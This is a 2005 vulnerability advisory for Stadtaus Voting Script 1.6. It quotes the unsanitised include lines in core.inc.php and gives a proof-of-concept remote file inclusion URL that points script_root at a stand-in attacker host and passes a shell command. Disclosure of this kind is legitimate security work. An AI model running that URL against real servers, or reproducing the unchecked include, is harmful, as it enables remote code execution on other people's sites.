-----------------------------------------------------------------------------
Name: Stadtaus Voting Script 
Release: 1.6 
Homepage: http://www.stadtaus.com/php_scripts/voting_script/
Attack: Remote file inclusion
Risk: High
Date: 8 March 2005
Author: Nextime
-----------------------------------------------------------------------------

CODE:

file: /vs1.6/inc/core.inc.php


  /*****************************************************
  ** Include functions
  *****************************************************/
  
          include($script_root . 'inc/functions.inc.php');
          include($script_root . 'inc/template.class.inc.php');
          include($script_root . 'inc/form_fields.class.inc.php');
          include($script_root . 'inc/voting.class.inc.php');

	  
	  
---------------------------------------------------------------------------------------------
	  
ATTACK:

If register_globals=on and allow_url_fopen=on

http://[target]/vs1.6/inc/core.inc.php?script_root=http://[attacker_host]/script.php?&cmd=id;


---------------------------------------------------------------------------------------------

FIX:

Vendor has been notifed

---------------------------------------------------------------------------------------------

Contact:

Nextime - nextime [at] linuxmail [dot] org


-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze